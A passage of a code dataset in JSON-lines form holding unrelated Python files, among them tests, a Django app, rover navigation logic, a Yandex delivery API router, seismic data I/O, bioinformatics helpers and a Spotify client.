= os.path.splitdrive(filepath)[1].lstrip(os.sep)\n filepath = joinpath(destdir, filepath)\n\n if 'linkto' in item:\n linkto = handlePath(item['linkto'], svars)\n assert islink(filepath)\n assert linkto == os.readlink(filepath)\n else:\n assert isfile(filepath)\n if PLATFORM != 'windows':\n chmodExpected = oct(item.get('chmod', 0o644))[-3:]\n chmodReal = oct(os.stat(filepath).st_mode)[-3:]\n assert chmodReal == chmodExpected\n\n cmdLine[0] = 'uninstall'\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n assert not os.path.exists(destdir)\n","repo_name":"pustotnik/zenmake","sub_path":"tests/func_install_test.py","file_name":"func_install_test.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"4755556427","text":"#encoding:gbk\nfrom tkMessageBox import showwarning\n'''\nhttps://www.cnblogs.com/qqnnhhbb/p/3601844.html\n'''\nimport win32com.client as handler\nfrom Tkinter import Tk\nfrom time import sleep\nwarn = lambda : showwarning(\"EXCEL\",'Exit?')\n\ndef makeExcel():\n work=handler.gencache.EnsureDispatch('Excel.Application')\n book=work.Workbooks.Add()\n work.DisplayAlerts = False\n sh=book.ActiveSheet\n work.Visible=True\n sleep(1)\n sh.Cells(1,1).Value='来自py 自动生成'\n sleep(1)\n for i in range(2,30):\n print(type(i),i)\n cells = sh.Cells(i, 1)\n cells.Value='Line %d' % i\n sleep(0.2)\n sh.Cells(i+2,1).Value='from py automatic '\n # warn()\n file=r'C:\\Users\\ck\\Desktop\\123.xlsx'\n book.SaveAs(file)\n work.Application.Quit()\nif __name__=='__main__':\n Tk().withdraw()\n makeExcel()\n\n","repo_name":"While1true/office","sub_path":"office/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70469795144","text":"import pytest\n\nimport torch\nfrom mugen.trainingmodules import Text2ImageTrainingModule\n\n@pytest.mark.skip(reason=\"Test runs too long\")\n@pytest.mark.parametrize(\n \"batch\",\n [\n {\n \"latent\": torch.rand(1, 4, 16, 16),\n \"text_embedding\": torch.rand(1, 768)\n },\n ]\n)\ndef test_forward(batch):\n module = Text2ImageTrainingModule('CompVis/stable-diffusion-v1-4')\n\n with pytest.raises(Exception):\n output = module.training_step(batch, 0, 0)\n assert isinstance(output, torch.Tensor)\n","repo_name":"hoang1007/finetuning-diffusers","sub_path":"tests/trainingmodules/test_text2image.py","file_name":"test_text2image.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71524286344","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal\nfrom django import template\n\nregister = template.Library()\n\n@register.filter\ndef bewertung(value, einheit='PUNKT'):\n if value is None:\n return ''\n elif einheit == 'ZEIT':\n return zeit2str(value)\n else:\n if value == 0:\n return '0'\n return '%.01f' % value\n\ndef zeit2str(value):\n assert isinstance(value, Decimal)\n minutes = value // 60\n fractional_seconds = value - (minutes * 60)\n seconds = fractional_seconds // 1\n millis = (fractional_seconds - seconds) * 100\n value = '%d:%02d.%02d' % (minutes, seconds, millis)\n return value\n\n","repo_name":"danielsteinmann/sasse","sub_path":"sasse/templatetags/sasse.py","file_name":"sasse.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70608799625","text":"import numpy as np\nimport time\nfrom perception import to_polar_coords\n\ndef slice_polar_coords(dist, angles, dist_range, angle_range):\n \"\"\"\n Returns a subset of pixel radial distances and angles, such that any pixel's radial distance and angle fall within specified range\n :param dist: list of pixel radial distances\n :param angles: list of corresponding pixel angles in degrees\n :param dist_range: binding range for radial distances\n :param angle_range: binding range for angles in degrees\n :return: list of distances and corresponding list of angles\n \"\"\"\n # find an intersection of indices that satisfy distance and angle thresholds\n indices_slice = list(filter(lambda idx: angles[idx] <= angle_range[1] and \\\n angles[idx] >= angle_range[0] and \\\n dist[idx] <= dist_range[1] and \\\n dist[idx] >= dist_range[0],range(len(angles))))\n\n # create a list of distance and angles that correspond to above indices\n dist1 = list()\n angles1 = list()\n dist1 = [dist[idx] for idx in indices_slice]\n angles1 = [angles[idx] for idx in indices_slice]\n\n if len(dist1) == 0: # if no index found i.e dist1 is empty, return None\n return None, None\n else:\n return dist1, angles1\n\ndef no_obstacle_ahead(dist, angles, thresh_dist, angle_thresh, min_dist_from_wall):\n \"\"\"\n Determines if terrain is navigable and returns a list of navigable-beam bounding angles\n :param dist: array of radial distances\n :param angles: array of polar angles in degrees\n :param thresh: minimum distance threshold\n :param angle_thresh: minimum navigable-beam angular width\n :return: boolean indicating no obstacle (True) and list of tuples, where each tuple is a pair of bounding angles of a navigable region\n \"\"\"\n\n # Method for determining beams\n #Create angular bins of size 0.5 degrees. Each bin angle corresponds to a beamlet\n angle_bins = np.linspace(-45, 45, 181)\n\n # copy dist and angles so as not to modify original\n new_dist = list(dist)\n new_angles = list(angles)\n\n # return indices to the bin to which each angle corresponds\n indices = np.digitize(new_angles, angle_bins)\n\n # create a dictionary with bin angle values as keys, and all distances that fall within that bin\n dict_of_dists_in_beamlets = {}\n for ang in angle_bins:\n dict_of_dists_in_beamlets[ang] = list()\n\n # populate each dictionary key by list of distances that correspond to\n # angles that belong to that key\n count = 0\n for idx in indices:\n if idx > 0 and idx <= len(angle_bins):\n dict_of_dists_in_beamlets[angle_bins[idx - 1]].append(new_dist[count])\n count += 1\n\n # for dictionary key that have empty list (no angle falls in that beamlet/potentially an obstacle),\n # assign -1\n for key, value in dict_of_dists_in_beamlets.items():\n if len(value) == 0:\n dict_of_dists_in_beamlets[key] = [-1]\n\n # find continuous beams, composed of consecutive beamlets\n list_of_nav_beamlets = []\n list_of_beamlet_bounding_angles = []\n in_ones = False\n # iterate through key, value pairs in the dictionary\n for key, value in dict_of_dists_in_beamlets.items():\n # create a list of all distances below a certain distance\n tmplist = list(filter(lambda elm: elm < (thresh_dist/abs(np.sin(45*np.pi/180)) + 20), value))\n if len(tmplist) != 0: # If beamlet has potentially navigable terrain in near field, check for obstacles in the range\n # from threshold to near field end, its max pixel should be in the mid near field. If that's not the case, mid near field for that\n # beamlet is not navigable and therefore that beamlet is excluded\n if np.amax(tmplist) > thresh_dist/abs(np.sin(45*np.pi/180)):\n #list_of_mins.append(1)\n if not in_ones:\n list_of_beamlet_bounding_angles.append([key, -45])\n in_ones = True\n else:\n list_of_beamlet_bounding_angles[-1].pop()\n list_of_beamlet_bounding_angles[-1].append(key)\n else:\n if in_ones:\n in_ones = False\n\n else:\n in_ones = False\n\n list_of_nav_beam_angles = list(filter(lambda elm: (elm[1] - elm[0]) > angle_thresh, list_of_beamlet_bounding_angles))\n\n dist1 = []\n angle1 = []\n\n for elm in list_of_nav_beam_angles:\n for ang in np.linspace(elm[0], elm[1], (elm[1] - elm[0]) // 0.5 + 1):\n dist1.append(15)\n angle1.append(ang)\n\n return (True if (len(list_of_nav_beam_angles) > 0 and \\\n get_steer_angle(list_of_nav_beam_angles, 5) != None) else False, \\\n list_of_nav_beam_angles)\n\ndef get_steer_angle(list_angles_pairs, max_allowed_angle):\n \"\"\"\n :param list_angles_pairs: list of tuples, where each tuple represents angular bounds of navigable-beam (in degrees)\n :param max_allowed_angle: maximum value for angular direction in degrees. in rover terms, left corresponds to positive, right negative\n :return: steer angle\n \"\"\"\n #sort list of angle pairs by the second element in the pair (larger or lefter angles)\n list_angles_pairs.sort(reverse = True, key=lambda x:x[1])\n for angle_pair in list_angles_pairs:\n if max_allowed_angle > angle_pair[1]:\n return (angle_pair[1] + angle_pair[0])/2\n elif max_allowed_angle <= angle_pair[1] and max_allowed_angle >= angle_pair[0]:\n return (max_allowed_angle + angle_pair[0])/2\n else:\n pass\n return None\n\ndef decision_step(Rover):\n # Implement conditionals to decide what to do given perception data\n # Here you're all set up with some basic functionality but you'll need to\n # improve on this decision tree to do a good job of navigating autonomously!\n\n # Example:\n # Check if we have vision data to make decisions with\n if (Rover.nav_angles is not None):\n # determine if obstacle ahead\n no_obs, list_of_angle_pairs = no_obstacle_ahead(Rover.nav_dists, Rover.nav_angles*180/np.pi, 30, 10,40)\n\n # Forward mode\n if Rover.mode == 'forward':\n # if there is no obstacle, determine steer angle and move in its direction\n if no_obs:\n Rover.steer = get_steer_angle(list_of_angle_pairs, Rover.max_allowed_left)\n # if velocity is below maximum allowable velocity, set throttle to max possible\n if Rover.vel < Rover.max_vel:\n Rover.throttle = Rover.throttle_set\n Rover.brake = 0\n else: # Else coast\n Rover.throttle = 0\n Rover.brake = 0\n\n # if there is obstacle ahead, brake (in proportion to velocity) and move to stop mode\n else:\n Rover.throttle = 0\n Rover.brake = max(Rover.brake_set, Rover.vel)\n Rover.steer = 0\n Rover.mode = 'stop'\n\n # Stop mode\n elif Rover.mode == 'stop':\n # If we're in stop mode but still moving keep braking\n if Rover.vel > 0.1:\n Rover.throttle = 0\n Rover.brake = max(Rover.brake_set, Rover.vel)\n Rover.steer = 0\n # If we're not moving (vel < 0.2) then do something else\n elif Rover.vel <= 0.1: # stopped\n # obstacle ahead\n if not no_obs:\n Rover.throttle = 0\n # Release the brake to allow turning\n Rover.brake = 0\n # turn to right by 10 degree\n Rover.steer = -10\n\n # no obstacle ahead, therefore increase speed\n if no_obs:\n # Set throttle back to stored value\n Rover.throttle = Rover.throttle_set\n # Release the brake\n Rover.brake = 0\n # Set steer to mean angle\n Rover.steer = get_steer_angle(list_of_angle_pairs, Rover.max_allowed_left)\n Rover.mode = 'forward'\n\n # if rover's velocity is not increasing despite throttle, it is blocked\n elif Rover.mode == 'blocked':\n # Now we're stopped and we have vision data to see if there's a path forward\n Rover.throttle = 0\n # Release the brake to allow turning\n Rover.brake = 0\n # Turn range is +/- 15 degrees, when stopped the next line will induce 4-wheel turning\n Rover.steer = -20 # Could be more clever here about which way to turn\n\n Rover.mode = 'forward'\n\n # Just to make the rover do something\n # even if no modifications have been made to the code\n else:\n Rover.throttle = Rover.throttle_set\n Rover.steer = 0\n Rover.brake = 0\n\n\n # # If in a state where want to pickup a rock send pickup command\n # if Rover.near_sample and Rover.vel == 0 and not Rover.picking_up:\n # Rover.send_pickup = True\n\n return Rover","repo_name":"kasliwalr/robotics","sub_path":"Courses/Udacity-RoboticsSW-Nanodegree/Sample-Search-And-Return/code/decision.py","file_name":"decision.py","file_ext":"py","file_size_in_byte":9446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29106923908","text":"import os\nimport json\nimport uuid\nimport requests\n\nfrom pydantic import BaseModel\nfrom fastapi import Request, APIRouter, File, UploadFile\n\nya = APIRouter()\n\n\n@ya.get('/api/ya/claims/search/active/')\ndef search():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims'];\n print(list(map(lambda claim: {'id': claim['id'], 'version': claim['revision']}, claims)))\n\n return {\n 'url': url,\n 'response': json.loads(response.text)\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\nclass CreateRq(BaseModel):\n point: list\n text: str\n\n\n@ya.post('/api/ya/claims/create')\ndef create(body: CreateRq):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/create'\n\n payload = {\n \"client_requirements\": {\n \"cargo_loaders\": 0,\n \"taxi_class\": \"courier\"\n },\n \"items\": [\n {\n \"cost_currency\": \"RUR\",\n \"cost_value\": \"100\",\n \"pickup_point\": 1,\n \"droppof_point\": 2,\n \"quantity\": 1,\n \"size\": {\n \"height\": 0.4,\n \"length\": 0.4,\n \"width\": 0.2\n },\n \"title\": \"Еда.\",\n \"weight\": 1\n }\n ],\n \"optional_return\": False,\n \"route_points\": [\n {\n \"point_id\": 1,\n \"visit_order\": 1,\n \"contact\": {\n \"name\": \"Иван\",\n \"phone\": \"+79138886060\"\n },\n \"type\": \"source\",\n \"address\": {\n \"city\": \"Томск\",\n \"coordinates\": [\n 84.94564528465693,\n 56.493949481830924\n ],\n \"country\": \"Россия\",\n \"description\": \"\",\n \"comment\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"fullname\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"shortname\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"street\": \"Карла Маркса\",\n \"building\": \"23а\"\n }\n },\n {\n \"point_id\": 2,\n \"visit_order\": 2,\n \"contact\": {\n \"name\": \"Иван\",\n \"phone\": \"+79138886060\"\n },\n \"type\": \"destination\",\n \"address\": {\n \"country\": \"Россия\",\n \"description\": \"\",\n \"fullname\": body.text,\n \"shortname\": body.text,\n \"street\": body.text,\n \"building\": body.text,\n \"coordinates\": body.point\n }\n }\n ]\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\n \"POST\",\n url,\n headers=headers,\n data=json.dumps(payload),\n params={\n \"request_id\": str(uuid.uuid4())\n }\n )\n\n return {\n 'url': url,\n 'request': json.loads(response.text),\n 'response': payload\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\ndef cancel_request(cid, version):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v1/claims/cancel'\n\n payload = {\n \"cancel_state\": \"free\",\n \"version\": version\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n params = {\n 'claim_id': cid\n }\n\n return {\n 'request': payload,\n 'response': json.loads(\n requests.request(\"POST\", url, headers=headers, data=json.dumps(payload), params=params).text),\n }\n\n\n@ya.get('/api/ya/claims/cancel')\ndef cancel_all():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims']\n\n responses = list(map(lambda claim: cancel_request(claim['id'], claim['revision']), claims))\n\n return {\n 'responses': responses\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\ndef accept_request(cid):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n url = 'b2b.taxi.yandex.net/b2b/cargo/integration/v1/claims/accept'\n payload = {\n \"version\": 1\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n params = {\n 'claim_id': cid\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload), params=params)\n\n return {\n 'request': payload,\n 'response': json.loads(response.text)\n }\n\n\n@ya.get('/api/ya/claims/accept/')\ndef accept_all():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims']\n\n responses = list(map(lambda claim: accept_request(claim['id']), claims))\n\n return {\n 'responses': responses\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n","repo_name":"RakhimBek/normapi","sub_path":"api/routers/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33361094437","text":"\"\"\"Handle the raw data input/output and interface with external formats.\"\"\"\n\nfrom obspy.core import read\nfrom obspy.core.utcdatetime import UTCDateTime\nimport pandas as pd\nimport datetime as dt\n\n\ndef load_stream(path):\n \"\"\"Loads a Stream object from the file at path.\n\n Args:\n path: path to the input file, (for supported formats see,\n http://docs.obspy.org/tutorial/code_snippets/reading_seismograms.html)\n\n Returns:\n an obspy.core.Stream object\n (http://docs.obspy.org/packages/autogen/obspy.core.stream.Stream.html#obspy.core.stream.Stream)\n \"\"\"\n\n stream = read(path)\n stream.merge()\n\n # assert len(stream) == 3 # We need X,Y,Z traces\n\n return stream\n\n\ndef load_catalog(path):\n \"\"\"Loads a event catalog from a .csv file.\n\n Each row in the catalog references a know seismic event.\n\n Args:\n path: path to the input .csv file.\n\n Returns:\n catalog: A Pandas dataframe.\n \"\"\"\n\n catalog = pd.read_csv(path)\n # Check if utc_timestamp exists, otherwise create it\n if 'utc_timestamp' not in catalog.columns:\n utc_timestamp = []\n for e in catalog.origintime.values:\n utc_timestamp.append(UTCDateTime(e).timestamp)\n catalog['utc_timestamp'] = utc_timestamp\n return catalog\n\n\ndef write_stream(stream, path):\n stream.write(path, format='MSEED')\n\n\ndef write_catalog(events, path):\n catalog = pd.DataFrame(\n {'utc_timestamp': pd.Series([t.timestamp for t in events])})\n catalog.to_csv(path)\n\ndef write_catalog_with_clusters(events, clusters, latitudes, longitudes, depths, path):\n catalog = pd.DataFrame(\n {'utc_timestamp': pd.Series([t for t in events]),\n \"cluster_id\": pd.Series([cluster_id for cluster_id in clusters]),\n \"latitude\": pd.Series([lat for lat in latitudes]),\n \"longitude\": pd.Series([lon for lon in longitudes]),\n \"depth\": pd.Series([d for d in depths])})\n catalog.to_csv(path)\n\n","repo_name":"tperol/ConvNetQuake","sub_path":"quakenet/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"81"} +{"seq_id":"75053980743","text":"import math\nimport random\nimport time\n\nfrom bpnet import bpnet\n\nclass ESIndividual:\n \"\"\"\n tar_vars is a list of target var\n steps is a list of standard deviation\n SD is a var of standard deviation\n delta is a var of S.D of each weight of tar_vars\n tar_vars = [nhl, nhmax, N]\n \"\"\"\n def __init__(self, ni, no, tar_vars, steps, bound, SD, delta):\n self.ni = ni\n self.no = no\n self.tar_vars = tar_vars\n self.steps = steps\n self.bound = bound\n self.SD = SD\n self.delta = delta\n self.fitness = 0\n self.bp = bpnet(self.ni, int(round(self.tar_vars[0])), int(round(self.tar_vars[1])), self.no, self.tar_vars[2])\n\n def mutate_tar_vars(self):\n N = random.gauss\n for key, item in enumerate(self.tar_vars):\n self.tar_vars[key] = item + N(0, self.steps[key])\n while self.tar_vars[key] < self.bound[key][0] \\\n or self.tar_vars[key] > self.bound[key][1]:\n self.tar_vars[key] = int(round(item + N(0, self.steps[key])))\n\n def mutate_adaptive(self):\n N = random.gauss\n for key, item in enumerate(self.steps):\n self.steps[key] = item*math.exp(N(0, self.SD) + N(0, self.delta))\n\n def generate(self):\n N = random.gauss\n mutate_steps = [item * math.exp(N(0, self.SD) + N(0, self.delta)) for item in self.steps]\n\n mutate_vars = []\n for key, item in enumerate(self.tar_vars):\n var = item + N(0, self.steps[key])\n while var < self.bound[key][0] \\\n or var > self.bound[key][1]:\n if 0 <= key<=1:\n var = int(round(item + N(0, self.steps[key])))\n else:\n var = item + N(0, self.steps[key])\n mutate_vars.append(var)\n return ESIndividual(self.ni, self.no, mutate_vars, mutate_steps, self.bound, self.SD, self.delta)\n\n def run(self, train_data):\n start = time.time()\n self.mutate_tar_vars()\n self.mutate_adaptive()\n self.bp.train(train_data, 4.1)\n self.fitness = time.time()-start\n\n def __repr__(self):\n return repr(self.fitness)\n\n","repo_name":"Lehyu/Code","sub_path":"DIP/Pro2/ESIndividual.py","file_name":"ESIndividual.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29458151824","text":"from django.contrib import admin\nfrom biblioteca.models import Autor\nfrom biblioteca.models import Libro\nfrom biblioteca.models import Ejemplar\nfrom biblioteca.models import Usuario\n\nclass LibroInline(admin.TabularInline):\n model = Libro\n\n\nclass LibroAdmin(admin.ModelAdmin):\n list_display = ('Titulo','Editorial','Autor')\n list_display_links = ('Titulo','Editorial')\n\nclass UsuarioAdmin(admin.ModelAdmin):\n list_display = ('Nombre','Telefono')\n fieldsets =(\n ('Datos',{\n 'fields': ('Nombre',)\n }),\n ('Contacto',{\n 'fields': ('Telefono','Direccion')\n })\n )\n\nclass EjemplarAdmin(admin.ModelAdmin):\n list_display = ('NombreLibro', 'NombreEditorial')\n list_filter = ('Libro',)\n\nclass AutorAdmin(admin.ModelAdmin):\n list_display = ('Codigo','Nombre')\n inlines = [LibroInline]\n search_fields = ['Nombre',]\n\nadmin.site.register(Autor,AutorAdmin)\nadmin.site.register(Libro,LibroAdmin)\nadmin.site.register(Ejemplar,EjemplarAdmin)\nadmin.site.register(Usuario,UsuarioAdmin)\n","repo_name":"DiogenesPuig/Ejercicios-con-Django","sub_path":"Ejercicio 1/biblioteca/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27743037336","text":"SNOWMAN_WORD= 'snowman'\nSNOWMAN_WRONG_GUESSES = 7\nSNOWMAN_1 = '* * * '\nSNOWMAN_2 = ' * _ * '\nSNOWMAN_3 = ' _[_]_ * '\nSNOWMAN_4 = ' * (\") '\nSNOWMAN_5 = ' \\( : )/ *'\nSNOWMAN_6 = '* (_ : _) '\nSNOWMAN_7 = '-----------'\nencrypt_list= []\n\n\ndef get_letter_from_user():\n flag_one_letter = False\n letter_from_user = None\n while not flag_one_letter:\n letter_from_user = input('Enter a letter: ').lower()\n if not letter_from_user.isalpha():\n print(\"Invalid character, please enter a letter.\")\n elif len(letter_from_user) > 1:\n print('You should input one single letter.')\n else:\n flag_one_letter = True\n return letter_from_user\n\ndef snowman():\n flag_correct_guess= False\n count_correct_guesses = 0\n count_wrong_guesses = 0\n while not flag_correct_guess and count_wrong_guesses < SNOWMAN_WRONG_GUESSES: \n letter = get_letter_from_user()\n if letter in SNOWMAN_WORD:\n count_correct_guesses += 1\n if count_correct_guesses == SNOWMAN_WRONG_GUESSES:\n flag_correct_guess = True \n else:\n count_wrong_guesses += 1\n draw_snowman(count_wrong_guesses)\n \n result = f\"You made {count_correct_guesses} correct and {count_wrong_guesses} incorrect guesses\" \n return result\n \ndef draw_snowman(count_wrong_guesses):\n for item in range(SNOWMAN_WRONG_GUESSES +1 - count_wrong_guesses, SNOWMAN_WRONG_GUESSES+1):\n if item == 1:\n print(SNOWMAN_1)\n elif item == 2:\n print(SNOWMAN_2)\n elif item ==3:\n print(SNOWMAN_3)\n elif item ==4:\n print(SNOWMAN_4) \n elif item ==5:\n print(SNOWMAN_5)\n elif item ==6:\n print(SNOWMAN_6) \n elif item ==7: \n print(SNOWMAN_7) \n\nsnowman() ","repo_name":"Anagabsoares/AdaPrecourse","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43272856737","text":"from collections import defaultdict, Counter\n\nNUCLEOTIDES = ['A', 'T', 'C', 'G']\nCOMPLIMENTS = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G'}\n\n\ndef count_nucleotides(strand: str) -> dict:\n \"\"\"\n Returns a dictionary containing the number of times each nucleotide is present in the strand.\n\n :param strand: A sequence of nucleotides\n \"\"\"\n return dict(Counter(strand))\n\n\ndef validate_strand(strand: str) -> bool:\n \"\"\"\n Check the strand for invalid bases\n \"\"\"\n strand = strand.upper()\n count = dict(Counter(strand))\n for k in count.keys():\n if k not in NUCLEOTIDES:\n raise Exception(\"Invalid DNA sequence\")\n return True\n\n\ndef transcription(strand: str) -> str:\n \"\"\"\n Returns the RNA transcription of the DNA.\n \"\"\"\n return strand.replace('T', 'U')\n\n\ndef coloured(seq):\n base_colours = {\n \"A\": '\\033[92m',\n 'C': '\\033[94m',\n 'G': '\\033[93m',\n 'T': '\\033[91m',\n 'U': '\\033[91m',\n 'reset': '\\033[0;0m'\n }\n\n temp_str = \"\"\n\n for nuc in seq:\n if nuc in base_colours:\n temp_str += base_colours[nuc] + nuc\n else:\n temp_str += base_colours['reset'] + nuc\n\n return temp_str + '\\033[0;0m'\n","repo_name":"RavinSG/Computational_Biology","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3943388853","text":"from keras.models import load_model, Model\nfrom src.common import sample_layer, utils\n\nmodel_path = 'path/to/saved_model'\nvae_model = load_model(model_path, custom_objects={'SampleLayer': sample_layer.SampleLayer})\nencoder_output_layer = 'sampling_layer'\ndecoder_input_layer = 'decoder_inp'\n\nenc_model = Model(inputs=[vae_model.input], outputs=[vae_model.get_layer('sampling_layer').output])\n\nmodel_splitter = utils.SplitModel(parent_model=vae_model)\n\nstart_idx = model_splitter.get_layer_idx_by_name(layername=decoder_input_layer)\nend_idx = len(vae_model.layers)\n\ndec_model = model_splitter.split_model(start=start_idx, end=end_idx)\n\nprint(enc_model.summary())\n","repo_name":"Knight13/beta-VAE-disentanglement","sub_path":"conifg.py","file_name":"conifg.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"71724414025","text":"from typing import List\nfrom spotipy import oauth2\nimport attr\nimport spotipy\n\n\n@attr.s(frozen=True)\nclass Artist:\n id: str = attr.ib()\n name: str = attr.ib()\n\n\n@attr.s(frozen=True)\nclass Track:\n name: str = attr.ib()\n artists: List[Artist] = attr.ib()\n\n\nclass SpotipyService:\n def __init__(self, client_id: str, client_secret: str) -> None:\n credentials = oauth2.SpotifyClientCredentials(\n client_id=client_id,\n client_secret=client_secret\n )\n token = credentials.get_access_token()\n self.sp = spotipy.Spotify(auth=token)\n\n def get_tracks_in_playlist(self, user_uri: str, playlist_uri: str) -> List[Track]:\n all_tracks: List[Track] = []\n\n playlist_data = self.sp.user_playlist(\n user_uri, playlist_uri, fields='tracks,next')\n tracks = playlist_data['tracks']\n\n all_tracks = self._read_tracks_page(all_tracks, tracks)\n\n # This is required to hand track pagnation\n while tracks['next']:\n tracks = self.sp.next(tracks)\n all_tracks = self._read_tracks_page(all_tracks, tracks)\n\n return all_tracks\n\n def _read_tracks_page(self, all_tracks: List[Track], tracks: any) -> List[Track]:\n for track in tracks['items']:\n all_tracks.append(self._parse_track(track['track']))\n\n return all_tracks\n\n @staticmethod\n def _parse_track(raw_track: any) -> Track:\n return Track(\n raw_track['name'],\n [Artist(artist['id'], artist['name']) for artist in raw_track['artists']]\n )\n","repo_name":"benfernandes/Spotifave","sub_path":"spotifave/spotipy_service.py","file_name":"spotipy_service.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9922712694","text":"import pandas as pd \r\nimport numpy as np\r\n\r\ndef timetable_to_datetime(timetable_file):\r\n #load original csv\r\n data = pd.read_csv(timetable_file, header=None)\r\n #remove empty columns\r\n data.dropna(axis='columns', inplace=True)\r\n #remove ellipses\r\n data = data[data[0]!='. . .'].reset_index(drop=True)\r\n #to datetime\r\n timetable = pd.DataFrame(columns=['timings'])\r\n for row in range(len(data.index)):\r\n #if next row is 2 or 4, the current contains a fraction\r\n current_cell = data.iloc[row,0]\r\n try: next_cell = data.iloc[row+1,0]\r\n except:\r\n pass\r\n if len(current_cell) > 5:\r\n if next_cell == '2':\r\n to_append = current_cell[:5]+' 30'\r\n timetable._set_value(row,'timings',to_append)\r\n elif next_cell == '4':\r\n if current_cell[-1] == '1':\r\n to_append = current_cell[:5]+' 15'\r\n elif current_cell[-1] == '3':\r\n to_append = current_cell[:5]+' 45'\r\n timetable._set_value(row,'timings',to_append)\r\n else:\r\n print('error '+str(current_cell))\r\n print(next_cell)\r\n elif len(current_cell)==1:\r\n pass\r\n else:\r\n to_append = current_cell+' 00'\r\n timetable._set_value(row,'timings',to_append)\r\n timetable.reset_index(inplace=True, drop=True)\r\n\r\n #covert to datetime\r\n timetable.timings = pd.to_datetime(timetable.timings, format='%H %M %S')\r\n\r\n #find passing time\r\n if 'cir' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('196.5S')\r\n else:\r\n timetable.timings += pd.to_timedelta('143.5S')\r\n elif 'bak' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('19S')\r\n else:\r\n timetable.timings += pd.to_timedelta('81S')\r\n elif 'vic' in timetable_file:\r\n if 'eas' in timetable_file:\r\n timetable.timings += pd.to_timedelta('16.5S')\r\n else:\r\n timetable.timings += pd.to_timedelta('101S')\r\n\r\n timetable.timings = timetable.timings.dt.time\r\n #save as csv\r\n 